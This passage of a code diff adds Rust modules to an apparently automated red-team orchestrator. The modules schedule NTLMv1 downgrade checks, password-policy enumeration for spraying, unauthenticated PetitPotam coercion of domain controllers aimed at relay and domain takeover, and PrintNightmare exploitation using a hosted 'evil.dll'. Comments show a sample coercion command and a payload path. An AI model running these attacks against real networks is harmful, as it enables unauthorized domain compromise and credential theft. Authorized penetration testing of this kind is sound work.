NTLMv1 hashes are trivially crackable."), + ); + d + }, + recommended_agent: "credential_access".to_string(), + priority: dispatcher.effective_priority("ntlmv1_downgrade"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + domain = %item.domain, + dc = %item.dc_ip, + "NTLMv1 downgrade — vulnerability registered" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to publish NTLMv1 downgrade vulnerability"); + } + } + } + Ok(None) => { + debug!(domain = %item.domain, "NTLMv1 downgrade check deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch NTLMv1 downgrade check"); + } + } + } + } +} + +struct NtlmV1Work { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("ntlmv1:{}", "192.168.58.10"); + assert_eq!(key, "ntlmv1:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1_downgrade"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ntlmv1_downgrade_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ntlmv1_downgrade_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = NtlmV1Work { + dedup_key: "ntlmv1:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_uses_dc_ip() { + // NTLMv1 dedup is by DC IP, not domain + let key = format!("ntlmv1:{}", "192.168.58.10"); + assert!(key.starts_with("ntlmv1:")); + assert!(key.contains("192.168.58.10")); + } + + // --- collect_ntlmv1_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() 
{ + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "ntlmv1:192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1:192.168.58.10".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_dcs_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_dedup_key_uses_ip_not_domain() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].dedup_key.starts_with("ntlmv1:")); + assert!(work[0].dedup_key.contains("192.168.58.10")); + assert!(!work[0].dedup_key.contains("contoso")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn dedup_keys_differ_per_dc() { + let key1 = format!("ntlmv1:{}", "192.168.58.10"); + let key2 = format!("ntlmv1:{}", "192.168.58.20"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/password_policy.rs b/ares-cli/src/orchestrator/automation/password_policy.rs new file mode 100644 index 00000000..9ae27ca8 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/password_policy.rs @@ -0,0 +1,380 @@ +//! 
auto_password_policy -- enumerate password policy per domain.
+//!
+//! Password policies reveal lockout thresholds, complexity requirements, and
+//! minimum lengths. This information is critical for planning password spray
+//! attacks without triggering lockouts.
+//!
+//! Dispatches `password_policy` recon tasks per discovered domain+DC pair.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+fn collect_password_policy_work(state: &StateInner) -> Vec<PasswordPolicyWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for (domain, dc_ip) in &state.all_domains_with_dcs() {
+        let dedup_key = format!("policy:{}", domain.to_lowercase());
+        if state.is_processed(DEDUP_PASSWORD_POLICY, &dedup_key) {
+            continue;
+        }
+
+        let cred = match state
+            .credentials
+            .iter()
+            .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+            .or_else(|| state.credentials.first())
+        {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        items.push(PasswordPolicyWork {
+            dedup_key,
+            domain: domain.clone(),
+            dc_ip: dc_ip.clone(),
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Enumerates password policy on each domain controller.
+/// Interval: 30s.
+pub async fn auto_password_policy(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+    let mut interval = tokio::time::interval(Duration::from_secs(30));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("password_policy") {
+            continue;
+        }
+
+        let work: Vec<PasswordPolicyWork> = {
+            let state = dispatcher.state.read().await;
+            collect_password_policy_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "password_policy",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("password_policy");
+            match dispatcher
+                .throttled_submit("recon", "credential_access", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        domain = %item.domain,
+                        dc = %item.dc_ip,
+                        "Password policy enumeration dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_PASSWORD_POLICY, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_POLICY, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(domain = %item.domain, "Password policy task deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, domain = %item.domain, "Failed to dispatch password policy enum");
+                }
+            }
+        }
+    }
+}
+
+struct PasswordPolicyWork {
+    dedup_key: String,
+    domain: String,
+    dc_ip: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::orchestrator::state::StateInner;
+
+    fn make_credential(
+        username: &str,
+        password: &str,
+        domain: &str,
+    ) -> ares_core::models::Credential {
+        ares_core::models::Credential {
+            id: format!("c-{username}"),
+            username: username.into(),
+            password: password.into(), // pragma: allowlist secret
+            domain: domain.into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id:
None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("policy:{}", "contoso.local"); + assert_eq!(key, "policy:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PASSWORD_POLICY, "password_policy"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "password_policy", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "password_policy"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = PasswordPolicyWork { + dedup_key: "policy:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "policy:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("policy:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "policy:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("policy:{}", "contoso.local"); + let key2 = format!("policy:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "policy:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_domains_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + 
.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into()); + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam credential available + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "policy:contoso.local"); + } +} diff --git 
a/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs
new file mode 100644
index 00000000..e67ce2e8
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs
@@ -0,0 +1,323 @@
+//! auto_petitpotam_unauth -- attempt unauthenticated PetitPotam (MS-EFSRPC)
+//! coercion against DCs.
+//!
+//! On unpatched systems, EfsRpcOpenFileRaw allows unauthenticated NTLM coercion.
+//! This was patched in August 2021 (KB5005413) but many environments still have
+//! it open. The check requires no credentials — only a listener IP and DC target.
+//!
+//! If successful, the captured DC machine account NTLM auth can be relayed to
+//! LDAP or ADCS for domain takeover.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect PetitPotam unauth work items from current state.
+///
+/// Pure logic extracted from `auto_petitpotam_unauth` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_petitpotam_unauth_work(state: &StateInner, listener: &str) -> Vec<PetitPotamWork> {
+    state
+        .domain_controllers
+        .iter()
+        .filter(|(_, dc_ip)| dc_ip.as_str() != listener)
+        .filter(|(_, dc_ip)| {
+            let dedup_key = format!("petitpotam_unauth:{dc_ip}");
+            !state.is_processed(DEDUP_PETITPOTAM_UNAUTH, &dedup_key)
+        })
+        .map(|(domain, dc_ip)| PetitPotamWork {
+            dedup_key: format!("petitpotam_unauth:{dc_ip}"),
+            domain: domain.clone(),
+            dc_ip: dc_ip.clone(),
+            listener: listener.to_string(),
+        })
+        .collect()
+}
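+// For orientation: the dispatched check corresponds roughly to running
+// topotam's PetitPotam.py with no credentials (illustrative invocation; the
+// exact tool and flags are the coercion worker's concern):
+//
+//     python3 PetitPotam.py 192.168.58.50 192.168.58.10
+//
+// where the first positional argument is the listener and the second is the
+// target DC.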
+
+/// Attempts unauthenticated PetitPotam against each DC once.
+/// Interval: 45s.
+pub async fn auto_petitpotam_unauth(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("petitpotam_unauth") {
+            continue;
+        }
+
+        let listener = match dispatcher.config.listener_ip.as_deref() {
+            Some(ip) => ip.to_string(),
+            None => continue,
+        };
+
+        let work: Vec<PetitPotamWork> = {
+            let state = dispatcher.state.read().await;
+            collect_petitpotam_unauth_work(&state, &listener)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "petitpotam_unauthenticated",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "listener_ip": item.listener,
+            });
+
+            let priority = dispatcher.effective_priority("petitpotam_unauth");
+            match dispatcher
+                .throttled_submit("coercion", "coercion", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        domain = %item.domain,
+                        dc = %item.dc_ip,
+                        "Unauthenticated PetitPotam coercion dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_PETITPOTAM_UNAUTH, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_PETITPOTAM_UNAUTH, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(dc = %item.dc_ip, "PetitPotam unauth deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch PetitPotam unauth");
+                }
+            }
+        }
+    }
+}
+
+struct PetitPotamWork {
+    dedup_key: String,
+    domain: String,
+    dc_ip: String,
+    listener: String,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::orchestrator::state::StateInner;
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("petitpotam_unauth:{}", "192.168.58.10");
+        assert_eq!(key, "petitpotam_unauth:192.168.58.10");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_PETITPOTAM_UNAUTH, "petitpotam_unauth");
+    }
+
+    #[test]
+    fn skips_self_listener() {
+        let dc_ip = "192.168.58.50";
+        let listener = "192.168.58.50";
+        assert_eq!(dc_ip, listener);
+    }
+
+    #[test]
+    fn no_cred_required() {
+        // PetitPotam unauth works without credentials
+        let _payload = serde_json::json!({
+            "technique": "petitpotam_unauthenticated",
+            "target_ip": "192.168.58.10",
+            "listener_ip": "192.168.58.50",
+        });
+        // No credential field needed
+    }
+
+    #[test]
+    fn payload_structure_has_correct_technique() {
+        let payload = serde_json::json!({
+            "technique": "petitpotam_unauthenticated",
+            "target_ip": "192.168.58.10",
+            "domain": "contoso.local",
+            "listener_ip": "192.168.58.50",
+        });
+        assert_eq!(payload["technique"], "petitpotam_unauthenticated");
+        assert_eq!(payload["target_ip"], "192.168.58.10");
+        assert_eq!(payload["domain"], "contoso.local");
+        assert_eq!(payload["listener_ip"], "192.168.58.50");
+        assert!(payload.get("credential").is_none());
+    }
+
+    #[test]
+    fn work_struct_construction() {
+        let work = PetitPotamWork {
+            dedup_key: "petitpotam_unauth:192.168.58.10".into(),
+            domain: "contoso.local".into(),
+            dc_ip: "192.168.58.10".into(),
+            listener: "192.168.58.50".into(),
+        };
+        assert_eq!(work.domain, "contoso.local");
+        assert_eq!(work.dc_ip, "192.168.58.10");
+        assert_eq!(work.listener, "192.168.58.50");
+    }
+
+    #[test]
+    fn dedup_key_based_on_dc_ip() {
+        let dc_ip = "192.168.58.10";
+        let key = format!("petitpotam_unauth:{dc_ip}");
+        assert_eq!(key, "petitpotam_unauth:192.168.58.10");
+    }
+
+    #[test]
+    fn dedup_keys_differ_per_dc() {
+        let key1 = format!("petitpotam_unauth:{}", "192.168.58.10");
+        let key2 = format!("petitpotam_unauth:{}", "192.168.58.20");
+        assert_ne!(key1, key2);
+    }
+
+    #[test]
+    fn
listener_excluded_from_targets() { + let dc_ip = "192.168.58.10"; + let listener = "192.168.58.50"; + assert_ne!(dc_ip, listener, "DC should not be the listener"); + + let self_target_dc = "192.168.58.50"; + assert_eq!(self_target_dc, listener, "Self-targeting should be skipped"); + } + + // --- collect_petitpotam_unauth_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_dcs_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "petitpotam_unauth:192.168.58.10"); + assert_eq!(work[0].listener, "192.168.58.50"); + } + + #[test] + fn collect_no_credentials_still_produces_work() { + // PetitPotam unauth does NOT require credentials + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_skips_dc_matching_listener() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.50".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed( + DEDUP_PETITPOTAM_UNAUTH, + "petitpotam_unauth:192.168.58.10".into(), + ); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed( + DEDUP_PETITPOTAM_UNAUTH, + "petitpotam_unauth:192.168.58.10".into(), + ); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); 
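+        // The write guard below is scoped to its own block so it is dropped
+        // before `shared.read()` is awaited; holding both guards at once on
+        // the same async RwLock would deadlock (assuming SharedState wraps
+        // one, as the read()/write() API suggests).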
+        {
+            let mut state = shared.write().await;
+            state
+                .domain_controllers
+                .insert("contoso.local".into(), "192.168.58.10".into());
+        }
+        let state = shared.read().await;
+        let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].domain, "contoso.local");
+    }
+}
diff --git a/ares-cli/src/orchestrator/automation/print_nightmare.rs b/ares-cli/src/orchestrator/automation/print_nightmare.rs
new file mode 100644
index 00000000..868eb8cf
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/print_nightmare.rs
@@ -0,0 +1,477 @@
+//! auto_print_nightmare -- exploit CVE-2021-1675 (PrintNightmare) when
+//! conditions are met.
+//!
+//! PrintNightmare exploits the Print Spooler service to achieve remote code
+//! execution. Requires: valid credentials, target with Print Spooler running
+//! (most Windows hosts by default), and a writable SMB share for the DLL.
+//!
+//! This module dispatches `printnightmare` against hosts where we have
+//! credentials but NOT admin access — it's a priv esc technique.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect PrintNightmare work items from state (pure logic, no async).
+fn collect_print_nightmare_work(
+    state: &StateInner,
+    listener: &str,
+    dll_path: &str,
+) -> Vec<PrintNightmareWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    // Target all discovered hosts (DCs + member servers)
+    for host in &state.hosts {
+        let ip = &host.ip;
+
+        // Skip if we already tried PrintNightmare on this host
+        if state.is_processed(DEDUP_PRINTNIGHTMARE, ip) {
+            continue;
+        }
+
+        // Skip hosts where we already have admin (secretsdump handles those)
+        if state.is_processed(DEDUP_SECRETSDUMP, ip) {
+            continue;
+        }
+
+        // Infer domain from hostname (e.g. "dc01.contoso.local" -> "contoso.local")
+        let domain = host
+            .hostname
+            .find('.')
+            .map(|i| host.hostname[i + 1..].to_lowercase())
+            .unwrap_or_default();
+
+        let cred = state
+            .credentials
+            .iter()
+            .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+            .or_else(|| state.credentials.first());
+
+        let cred = match cred {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        items.push(PrintNightmareWork {
+            target_ip: ip.clone(),
+            hostname: host.hostname.clone(),
+            domain: domain.clone(),
+            listener: listener.to_string(),
+            dll_path: dll_path.to_string(),
+            credential: cred,
+        });
+    }
+
+    items
+}
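+// Operational note: the dispatch loop below is gated on the
+// `ARES_PRINTNIGHTMARE_DLL` environment variable. A minimal way to enable it
+// (illustrative UNC path; any share the worker can resolve works):
+//
+//     export ARES_PRINTNIGHTMARE_DLL='\\192.168.58.50\share\evil.dll'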
+
+/// Monitors for PrintNightmare exploitation opportunities.
+/// Only targets hosts we don't already have admin on.
+/// Interval: 45s.
+pub async fn auto_print_nightmare(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("printnightmare") {
+            continue;
+        }
+
+        let listener = match dispatcher.config.listener_ip.as_deref() {
+            Some(ip) => ip.to_string(),
+            None => continue, // need listener for DLL hosting
+        };
+
+        // PrintNightmare requires a UNC path to a hosted malicious DLL. Without
+        // pre-staged SMB share + payload infra, dispatching is guaranteed to
+        // fail on the worker (cve_exploits.rs requires `dll_path`). Skip
+        // cleanly when not configured rather than emitting failed tasks.
+        let dll_path = match std::env::var("ARES_PRINTNIGHTMARE_DLL").ok() {
+            Some(path) if !path.is_empty() => path,
+            _ => continue,
+        };
+
+        let work: Vec<PrintNightmareWork> = {
+            let state = dispatcher.state.read().await;
+            collect_print_nightmare_work(&state, &listener, &dll_path)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "printnightmare",
